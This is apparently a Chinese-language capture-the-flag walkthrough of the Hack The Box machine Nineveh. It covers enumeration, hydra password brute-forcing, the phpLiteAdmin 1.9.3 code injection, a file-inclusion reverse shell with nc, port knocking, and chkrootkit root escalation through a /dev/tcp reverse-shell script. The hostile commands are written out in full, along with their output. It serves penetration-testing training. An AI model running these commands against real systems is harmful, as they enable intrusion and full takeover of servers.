Nineveh
Enumeration
nmap
先使用 nmap 扫描常见端口,发现只开放了 80 和 443 端口,不想扫描详细信息了
┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ nmap 10.10.10.43
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-01 01:42 EDT
Nmap scan report for 10.10.10.43
Host is up (0.45s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 36.22 seconds
两个端口展示的内容不同,80 端口显示如下
443 端口显示如下
Web 页面中都没有什么东西,使用 gobuster 扫描一下目录
gobuster dir --url http://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.80
gobuster dir --url https://10.10.10.43 --wordlist /usr/share/dirb/wordlists/big.txt -o dir.443 -k
80 端口扫描出来发现了一个 /department 接口,访问会自动跳转至 /department/login.php,输入常见的用户名口令admin/123456 登录,页面提示 invalid password,而输入 vegetable 作为用户名,页面会显示 invalid username,可以确认用户名为 admin
没有密码,暂时也不想暴力破解,查看 443 端口的目录扫描结果,发现了 /db 接口,访问发现页面如下
phpLiteAdmin 是一个基于 Web 的 SQLite 数据库管理工具,用 PHP 编写,支持 SQLite3 和 SQLite2。遵循 SQLite 使用的平面文件系统的精神,phpLiteAdmin 由单个源文件 phpliteadmin.php 组成,该文件被放入服务器上的目录中,然后在浏览器中访问。
因为很知名,用的人也很多,也已经知道了版本信息。搜索看看有没有漏洞
Exploitation
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection
我比较感兴趣的是最后一个,版本匹配,而且可以执行命令,不过首先需要登录。phpLiteAdmin 系统只需要输入密码即可,可以尝试利用 hydra 来暴力破解,虽然只需要爆破密码,但是仍然需要指定一个用户名,虽然可能并不会使用指定的用户名,这里我指定了 admin,选用了一个比较小的字典,很快就得到了答案
┌──(kali㉿kali)-[~/vegetable/HTB/Nineveh]
└─$ hydra 10.10.10.43 -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 03:42:54
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[443][http-post-form] host: 10.10.10.43 login: admin password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 03:43:34很快就发现了密码,使用 password123 登录系统,然后按照 PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com) 来进行漏洞利用
1、创建一个新的数据库 hack.php
2、创建一个新表,类型为 TEXT,Value 为
3、创建成功返回后,可以点击 Rename Database 来查看路径
但是无法访问该文件,线索又断了,只能重新回到 80 端口,因为可以确定用户名为 admin,尝试暴力破解登录看看,然后非常快就得到了结果
┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-04-01 04:53:05
[DATA] max 16 tasks per 1 server, overall 16 tasks, 197 login tries (l:1/p:197), ~13 tries per task
[DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^:Invalid Password
[80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-01 04:53:19
使用用户名口令登录系统,点击 Notes 可以看到下面的话,secret folder,还有 url 的格式感觉都像是 LFI
测试如果直接添加 ···manage.php?notes=../../../../../../../etc/passwd 则会显示 No Note is selected,添加上 /files/ninevehNotes.txt 又会报错,在尝试后,发现在 txt 后添加 7 个 ../ 可以成功包含文件
但是当我使用命令 manage.php?notes=files/ninevehNotes/../../../../../../../var/tmp/hack.php 尝试包含刚才创建的 hack.php 时又会显示 File name too long. 然后我删掉了一个 ../ 成功的包含了 hack.php 文件,并且可以执行命令
可以在 Online - Reverse Shell Generator (revshells.com) 中构造一个反向连接 shell,执行后在监听端会收到一个 shell
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/hack.php&cmd=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.9%204444%20%3E%2Ftmp%2Ff
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 33734
bash: cannot set terminal process group (1412): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml/department$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@nineveh:/var/www/html/department$ ^Z
zsh: suspended nc -nvlp 4444
┌──(kali㉿kali)-[~]
└─$ stty raw -echo;fg
[1] + continued nc -nvlp 4444
reset
reset: unknown terminal type unknown
Terminal type? screenPrivilege Escalation
steghide
目前拿到了 www-data 的 shell,在 /var/www/ssl/secure_notes 目录中发现了一张图片 nineveh.png,使用 cat 直接打开时发现出现了下面的 rsa 密钥,可以直接使用 strings 命令打开,看起来会舒服一点,将私钥复制保存在 kali 机器中,并为其赋予 600 权限,以便后期可以利用密钥连接 ssh 服务
port knocking
一开始使用 nmap 扫描并没有发现 22 端口,需要利用 port knocking
www-data@nineveh:/var/www/ssl/secure_notes$ netstat -anultp | grep 22
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN - knockd 程序,当按照一定顺序敲击端口时,它将会设置某些防火墙规则,配置文件如下。看到如果在 5 秒钟之内,按照 571,290,911 的顺序依次访问这些端口,达成敲门效果,则会对外开放 22 端口
www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
[options]
logfile = /var/log/knockd.log
interface = ens160
[openSSH]
sequence = 571, 290, 911
seq_timeout = 5
start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 911,290,571
seq_timeout = 5
start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
可以参考 端口敲击 - ArchWiki (archlinux.org) 来查看如何操作,因为只有 5 秒,所以可以利用 for 循环让机器自动执行 nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 操作,在所有端口都访问过之后,22 端口会被打开,利用 id_rsa 来连接 ssh 服务
┌──(kali㉿kali)-[~]
└─$ for i in 571 290 911; do
nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43
done; ssh -i vegetable/HTB/Nineveh/id_rsa amrois@10.10.10.43
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
571/tcp filtered umeter
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
290/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-02 02:58 EDT
Warning: 10.10.10.43 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.43
Host is up.
PORT STATE SERVICE
911/tcp filtered xact-backup
Nmap done: 1 IP address (1 host up) scanned in 1.04 seconds
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
288 packages can be updated.
207 updates are security updates.
You have mail.
Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$
成功登录后,在当前目录下可以看到 user.txt
chkrootkit
上传 linpeas.sh 来枚举系统弱点,发现存在有计划任务,在 report 目录下存在有很多 report.txt,并且 /usr/sbin/report-reset.sh 也会定期删除这些文件
amrois@nineveh:/report$ ls -al
total 56
drwxr-xr-x 2 amrois amrois 4096 Apr 2 02:05 .
drwxr-xr-x 24 root root 4096 Jan 29 2021 ..
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:00 report-24-04-02:02:00.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:01 report-24-04-02:02:01.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:02 report-24-04-02:02:02.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:03 report-24-04-02:02:03.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:04 report-24-04-02:02:04.txt
-rw-r--r-- 1 amrois amrois 4801 Apr 2 02:05 report-24-04-02:02:05.txt上传并运行 pspy,发现了每分钟都有一连串的任务,很多进程调用了 chkrootkit 工具,搜索时发现该工具存在本地提权漏洞
┌──(kali㉿kali)-[~]
└─$ searchsploit chkrootkit
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
漏洞其实就是该程序会定期以 root 身份执行 /tmp/update 文件,所以在 /tmp 目录下创建一个包含有反向 shell 连接脚本内容的 update文件即可
amrois@nineveh:/tmp$ cat update
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.22/443 0>&1过一段时间,在监听端即可收到 shell
参考链接:
PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps Exploit (exploit-db.com)
Online - Reverse Shell Generator (revshells.com)
400
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
